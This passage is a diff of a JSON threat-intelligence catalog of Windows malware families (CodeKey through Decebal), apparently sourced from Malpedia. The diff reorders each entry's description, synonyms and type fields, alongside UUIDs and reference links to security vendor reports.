"value": "CodeKey", - "description": "" + "value": "CodeKey" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", - "value": "Cohhoc", - "description": "" + "value": "Cohhoc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://secrary.com/ReversingMalware/CoinMiner/", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", - "value": "Coinminer", - "description": "" + "value": "Coinminer" }, { + "description": "", "meta": { - "synonyms": [ - "Bandios", - "GrayBird" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" - ] + ], + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", - "value": "Colony", - "description": "" + "value": "Colony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", - "value": "Combojack", - "description": "" + "value": "Combojack" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", - "value": "Combos", - "description": "" + "value": "Combos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", - "value": "ComodoSec", - "description": "" + "value": "ComodoSec" }, { + "description": "", "meta": { - "synonyms": [ - "lojack" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" - ] + ], + "synonyms": [ + "lojack" + ], + "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", - "value": "Computrace", - "description": "" + "value": "Computrace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", - "value": "ComradeCircle", - "description": "" + "value": "ComradeCircle" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", - "value": "concealment_troy", - "description": "" + "value": "concealment_troy" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ], "synonyms": [ "downadup", "traffic converter" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "http://contagiodump.blogspot.com/2009/05/win32conficker.html" - ] + "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", - "value": "Conficker", - "description": "" + "value": "Conficker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", - "value": "Confucius", - "description": "" + "value": "Confucius" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", - "value": "Contopee", - "description": "" + "value": "Contopee" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", - "value": "CookieBag", - "description": "" + "value": "CookieBag" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", - "value": "Corebot", - "description": "" + "value": "Corebot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://malware.prevenity.com/2014/08/malware-info.html", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", - "value": "Coreshell", - "description": "" + "value": "Coreshell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", - "value": "CradleCore", - "description": "" + "value": "CradleCore" }, { + "description": "", "meta": { - "synonyms": [ - "Crash", - "Industroyer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" - ] + ], + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", - "value": "CrashOverride", - "description": "" + "value": "CrashOverride" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", - "value": "Credraptor", - "description": "" + "value": "Credraptor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", - "value": "Crenufs", - "description": "" + "value": "Crenufs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson", - "description": "" + "value": "Crimson" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" + "value": "Crisis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://hackmag.com/security/ransomware-russian-style/", @@ -4953,326 +4955,326 @@ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://twitter.com/demonslay335/status/971164798376468481" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", - "value": "Cryakl", - "description": "" + "value": "Cryakl" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", - "value": "CryLocker", - "description": "" + "value": "CryLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", - "value": "CrypMic", - "description": "" + "value": "CrypMic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", - "value": "Crypt0l0cker", - "description": "" + "value": "Crypt0l0cker" }, { + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://www.secureworks.com/research/cryptolocker-ransomware", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", - "value": "CryptoLocker", - "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + "value": "CryptoLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", - "value": "CryptoLuck", - "description": "" + "value": "CryptoLuck" }, { + "description": "", "meta": { - "synonyms": [ - "CryptFile2" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" - ] + ], + "synonyms": [ + "CryptFile2" + ], + "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", - "value": "CryptoMix", - "description": "" + "value": "CryptoMix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", "https://twitter.com/struppigel/status/810770490491043840" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", - "value": "Cryptorium", - "description": "" + "value": "Cryptorium" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", - "value": "CryptoShield", - "description": "" + "value": "CryptoShield" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", - "value": "CryptoShuffler", - "description": "" + "value": "CryptoShuffler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", - "value": "Cryptowall", - "description": "" + "value": "Cryptowall" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", - "value": "CryptoWire", - "description": "" + "value": "CryptoWire" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", - "value": "CryptoFortress", - "description": "" + "value": "CryptoFortress" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", - "value": "CryptoRansomeware", - "description": "" + "value": "CryptoRansomeware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", - "value": "CryptXXXX", - "description": "" + "value": "CryptXXXX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", - "value": "CsExt", - "description": "" + "value": "CsExt" }, { + "description": "", "meta": { - "synonyms": [ - "Windshield?" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" - ] + ], + "synonyms": [ + "Windshield?" + ], + "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", - "value": "Cuegoe", - "description": "" + "value": "Cuegoe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", - "value": "Cueisfry", - "description": "" + "value": "Cueisfry" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", - "value": "Cutlet", - "description": "" + "value": "Cutlet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", - "value": "Cutwail", - "description": "" + "value": "Cutwail" }, { + "description": "", "meta": { - "synonyms": [ - "Rebhip" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" - ] + ], + "synonyms": [ + "Rebhip" + ], + "type": [] }, "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", - "value": "CyberGate", - "description": "" + "value": "CyberGate" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", - "value": "CyberSplitter", - "description": "" + "value": "CyberSplitter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", - "value": "CycBot", - "description": "" + "value": "CycBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", - "value": "Dairy", - "description": "" + "value": "Dairy" }, { + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", @@ -5280,288 +5282,286 @@ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", - "value": "DanaBot", - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " + "value": "DanaBot" }, { + "description": "", "meta": { - "synonyms": [ - "Fynloski", - "klovbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", "https://darkcomet.net", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] + ], + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", - "value": "DarkComet", - "description": "" + "value": "DarkComet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", - "value": "DarkMegi", - "description": "" + "value": "DarkMegi" }, { + "description": "", "meta": { - "synonyms": [ - "Chymine" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" - ] + ], + "synonyms": [ + "Chymine" + ], + "type": [] }, "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", - "value": "Darkmoon", - "description": "" + "value": "Darkmoon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", - "value": "DarkPulsar", - "description": "" + "value": "DarkPulsar" }, { + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", - "value": "DarkShell", - "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + "value": "DarkShell" }, { + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "https://blog.radware.com/security/2018/02/darksky-botnet/", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://github.com/ims0rry/DarkSky-botnet" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", - "value": "Darksky", - "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." + "value": "Darksky" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", - "value": "DarkStRat", - "description": "" + "value": "DarkStRat" }, { + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", - "value": "DarkTequila", - "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." + "value": "DarkTequila" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", - "value": "Darktrack RAT", - "description": "" + "value": "Darktrack RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Muirim", - "Nioupale" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] + ], + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", - "value": "Daserf", - "description": "" + "value": "Daserf" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", - "value": "Datper", - "description": "" + "value": "Datper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", - "value": "DDKONG", - "description": "" + "value": "DDKONG" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", 